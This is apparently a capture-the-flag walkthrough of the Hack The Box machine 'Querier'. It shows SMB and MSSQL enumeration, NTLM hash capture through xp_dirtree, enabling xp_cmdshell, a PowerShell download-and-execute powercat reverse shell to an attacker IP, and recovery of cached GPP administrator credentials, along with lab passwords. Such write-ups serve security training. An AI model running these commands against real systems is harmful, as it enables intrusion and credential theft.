Querier
OS: Windows, Difficulty: Medium, IP: 10.10.10.125
Initial Enumeration
# Nmap 7.70 scan initiated Sun Jul 28 02:15:58 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 49670,445,49667,1433,139,49671,49688,5985,135,49669,47001,49664,49665,49666 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-07-27T12:38:20
|_Not valid after: 2049-07-27T12:38:20
|_ssl-date: 2019-07-27T19:40:20+00:00; -1h06m51s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49688/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/28%OT=135%CT=49688%CU=31917%PV=Y%DS=2%DC=T%G=Y%TM=5D
OS:3CB857%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=
OS:S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DN
OS:W8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN
OS:(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=8
OS:0%CD=Z)
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h06m50s, deviation: 0s, median: -1h06m51s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-07-28 01:10:22
|_ start_date: N/A
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 221.96 ms 10.10.14.1
2 222.13 ms 10.10.10.125
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 28 02:17:19 2019 -- 1 IP address (1 host up) scanned in 81.37 secondsSMB Enumeration
$ smbmap -u "ANYTHING" -H 10.10.10.125
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445 Name: 10.10.10.125
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Reports READ ONLYChecking contents of Reports
$ smbclient -U "ANYTHING" \\\\10.10.10.125\\Reports "" -c 'recurse;ls' ""
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
. D 0 Tue Jan 29 04:53:48 2019
.. D 0 Tue Jan 29 04:53:48 2019
Currency Volume Report.xlsm A 12229 Mon Jan 28 03:51:34 2019
6469119 blocks of size 4096. 1612111 blocks availableFetch the file and unzip the contents
$ smbclient -U "ANYTHING" \\\\10.10.10.125\\Reports "" -c 'get "Currency Volume Report.xlsm" Reports.xlsm' ""
$ unzip Reports.xlsm -d XL_contents
$ ls -la XL_contents/
total 24
drwxr-xr-x 5 jtnydv jtnydv 4096 Jul 28 00:35 .
drwxr-xr-x 3 jtnydv jtnydv 4096 Jul 28 21:09 ..
-rw-r--r-- 1 jtnydv jtnydv 1087 Jan 1 1980 '[Content_Types].xml'
drwxr-xr-x 2 jtnydv jtnydv 4096 Jul 28 00:35 docProps
drwxr-xr-x 2 jtnydv jtnydv 4096 Jul 28 00:35 _rels
drwxr-xr-x 5 jtnydv jtnydv 4096 Jul 28 00:35 xl
$ cat XL_contents/xl/vbaProject.bin
...
(- macro to pull data for client volume reports.0n.Conn]8]Xx
0(<Open 0B@rver=<SELECT * FROM volume; 0%B.6word> 0!> @ MsgBox "connection successful" 6A1$D%FB@H 6B@BkXo,Set rs = conn.Execute("SELECT * @@version;")
XkDriver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6 0(: further testing requiredHAttribute VB
_Name = "ThisWorkbook" Credentials for the SQL Server: reporting:PcwTWTHRwryjc$c6
All the scripts used can be found at Impacket's Github Repository.
MS SQL Database Enumeration
$ python mssqlclient.py reporting:PcwTWTHRwryjc\$c6@10.10.10.125 -windows-auth
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> xp_cmdshell "ping"
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL> exec master.dbo.xp_dirtree
[-] ERROR(): Line 0: Error executing extended stored procedure: Invalid Parameter
DIRTREE can be run without any restriction, thus we can use this to capture NTLM hashes.
On attacking machine.
sudo python smbserver.py -smb2support -ip 10.10.14.13 myshare .On victim machine's SQL server
SQL> exec master.dbo.xp_dirtree '\\10.10.14.13\myshare'Results
[*] Incoming connection (10.10.10.125,49695)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User mssql-svc\QUERIER authenticated successfully
[*] mssql-svc::QUERIER:4141414141414141:a86910d42e63**HASH_VALUE**This hash can be cracked using JTR or Hashcat to get the credentials for the user mssql-svc i.e mssql-svc:corporate568
$ python mssqlclient.py mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "cmd.exe /c ping 10.10.14.13"
output
--------------------------------------------------------------------------------
NULL
Pinging 10.10.14.13 with 32 bytes of data:
Reply from 10.10.14.13: bytes=32 time=226ms TTL=63
Reply from 10.10.14.13: bytes=32 time=219ms TTL=63
Reply from 10.10.14.13: bytes=32 time=229ms TTL=63
Reply from 10.10.14.13: bytes=32 time=231ms TTL=63
NULL
Ping statistics for 10.10.14.13:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 219ms, Maximum = 231ms, Average = 226ms
NULL
SQL> We have code execution, now we'll use PowerCat to get a reverse shell on the system using xp_cmdshell. Please note, you'll have to host PowerCat on your machine first to download it on the victim machine.
SQL> xp_cmdshell 'powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.13/powercat.ps1");powercat -c 10.10.14.13 -p 9999 -e powershell'User Own
PS C:\Users\mssql-svc\Desktop> type user.txt
type user.txt
c37b4***Root Own
We'll download and import all modules from PowerSploit repository and use them for further enumeration.
Useful Commands:
## Download a file using PowerShell
powershell -command "& { iwr http://10.10.14.13/PowerUp.ps1 -OutFile PowerUp.ps1 }"
## Import a module from a different location
Import-Module -Name C:\Users\mssql-svc\modules\PowerUp.ps1 -VerbosePS C:\Users\mssql-svc\Desktop> Get-CachedGPPPassword
Get-CachedGPPPassword
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUncles****}
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xmlNow we'll use the credentials to execute commands as Administrator.
$Username = 'Administrator'
$Password = 'MyUncles***'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }
PS C:\Users\mssql-svc\modules> Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }
Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }
b19c3***Learning Outcome
Learnt a little too much from this box, NTLM hash catching, Powershell Modules, Invoke-Command module, and MS-SQL using Impacket. Amazing Box.
Last updated
